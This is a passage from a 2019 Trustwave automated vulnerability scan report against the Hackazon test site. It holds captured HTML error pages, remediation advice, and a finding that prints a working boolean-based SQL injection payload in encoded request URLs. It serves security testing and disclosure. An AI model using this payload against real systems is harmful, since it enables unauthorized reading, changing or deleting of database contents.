Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 838 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon — Error: 404 Invalid product id</title>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 839 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<script type="text/javascript">
var App = window.App || {};
App.config =
{"host":"http:\/\/hackazon.webscantest.com","user":{"id":"473","userna
me":"CHSuser","first_name":"John","last_name":"Smith","user_phone":"
4085551234","email":"jsmith20@kelev.biz","created_on":"2019-08-05
20:02:57","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\
/","dataType":"xml"};
</script>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 840 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>
<script type="text/javascript">
// For version detection, set to min. required Flash Player version,
or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise
the empty string.
var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 841 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in
case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-
align:left;");
}, 300);
}
});
</script>
</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 842 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 843 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 844 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 845 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 846 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 847 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 848 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 849 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 850 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 851 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 852 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Port: tcp/80
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 853 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
GET -
http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%2
8CASE+WHEN+%2819%3D20%29+THEN+0x7465787476616c7565+E
LSE+0x28+END%29%29--+ - id
False Injection: ' RLIKE (SELECT (CASE WHEN (19=20) THEN
0x7465787476616c7565 ELSE 0x28 END))--
True Injection: ' RLIKE (SELECT (CASE WHEN (19=19) THEN
0x7465787476616c7565 ELSE 0x28 END))--
True Request: GET
http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%2
8CASE+WHEN+%2819%3D19%29+THEN+0x7465787476616c7565+E
LSE+0x28+END%29%29--+ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 854 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Hackazon — Error: 404 No such category</title>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 855 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<script type="text/javascript">
var App = window.App || {};
App.config =
{"host":"http:\/\/69.164.223.171","user":{"id":"209","username":"CHSu
ser","first_name":"John","last_name":"Smith","user_phone":"408555123
4","email":"jsmith20@kelev.biz","created_on":"2019-08-05
21:24:27","photo":null,"photoUrl":null},"baseImgPath":"\/user_pictures\
/","dataType":"xml"};
</script>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 856 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<script src="/js/tools.js"></script>
<script src="/js/site.js"></script>
<script type="text/javascript">
// For version detection, set to min. required Flash Player version,
or 0 (or 0.0.0), for no version detection.
var swfVersionStr = "11.1.0";
// To use express install, set to playerProductInstall.swf, otherwise
the empty string.
var xiSwfUrlStr = "/swf/playerProductInstall.swf";
var flashvars = {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 857 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
$(function () {
if ($('#flashBanner').length) {
setTimeout(function () {
swfobject.embedSWF(
"/swf/SliderBanner.swf", "flashBanner",
"360", "290",
swfVersionStr, xiSwfUrlStr,
flashvars, params, attributes);
// JavaScript enabled so display the flashContent div in
case it is not replaced with a swf object.
swfobject.createCSS("#flashBanner", "display:block;text-
align:left;");
}, 300);
}
});
</script>
</head>
<body class="">
<header class="hw-header">
<nav class="navbar hw-navbar navbar-fixed-top" role="navigation"
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 858 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 859 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 860 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 861 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 862 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 863 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 864 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 865 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 866 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 867 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 868 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 869 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVE-2017-7679 - mod_mime can read one byte past its' buffer when
used in a malicious Content-Type response header.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 870 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06